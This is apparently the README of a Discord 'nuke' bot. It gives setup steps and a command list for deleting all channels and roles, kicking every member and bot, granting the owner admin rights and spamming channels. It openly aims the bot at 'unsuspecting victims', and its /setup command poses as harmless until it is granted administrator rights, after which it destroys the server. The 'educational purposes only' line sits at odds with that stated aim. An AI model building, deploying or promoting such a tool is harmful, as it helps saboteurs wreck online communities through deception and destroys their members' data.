- Terminal dashboard with server and permissions info (Rich).
- Prefix commands (
!@command) and slash command (/setup) to instant nuke unsuspecting victims. - Commands for nuking, deleting channels/roles, kicking bots/members, trolling, and more.
-
Clone the repository and navigate to the project folder.
-
Install dependencies:
pip install -r requirements.txt
-
Configure the bot:
- Edit
config.pyand fill in your bot token and your Discord user ID:BOT_TOKEN = "<your-bot-token>" OWNER_ID = <your-user-id>
- Edit
-
(Optional) Place an image for trolling:
- Save the provided banner image as
banner.pngin the same directory. - For the troll command, place an
image.pngin the same directory.
- Save the provided banner image as
-
Run the bot:
python main.py
Type these in any server where the bot is present:
!@nuke- Run all destructive actions (nuke server).!@deletechannel- Delete all channels.!@deleterole- Delete all roles.!@botkick- Kick all bots.!@kickall- Kick all members (except you).!@troll- Change server name and icon.!@giveperm- Give admin role to OWNER_ID.!@masscreatechannel- Create 50 channels and send a message in each.!@masscreaterole- Create 50 roles.
/setup- If the bot has admin permissions, it will nuke the server.
- If not, it will send an innocent message saying need administator for using this command..
- Only the OWNER_ID can use the commands.
- Make sure to enable the "Server Members Intent" in the Discord developer portal.
- Do NOT share your
config.pyor bot token. - The bot is destructive. Use with caution and only in test servers.
For educational purposes only.
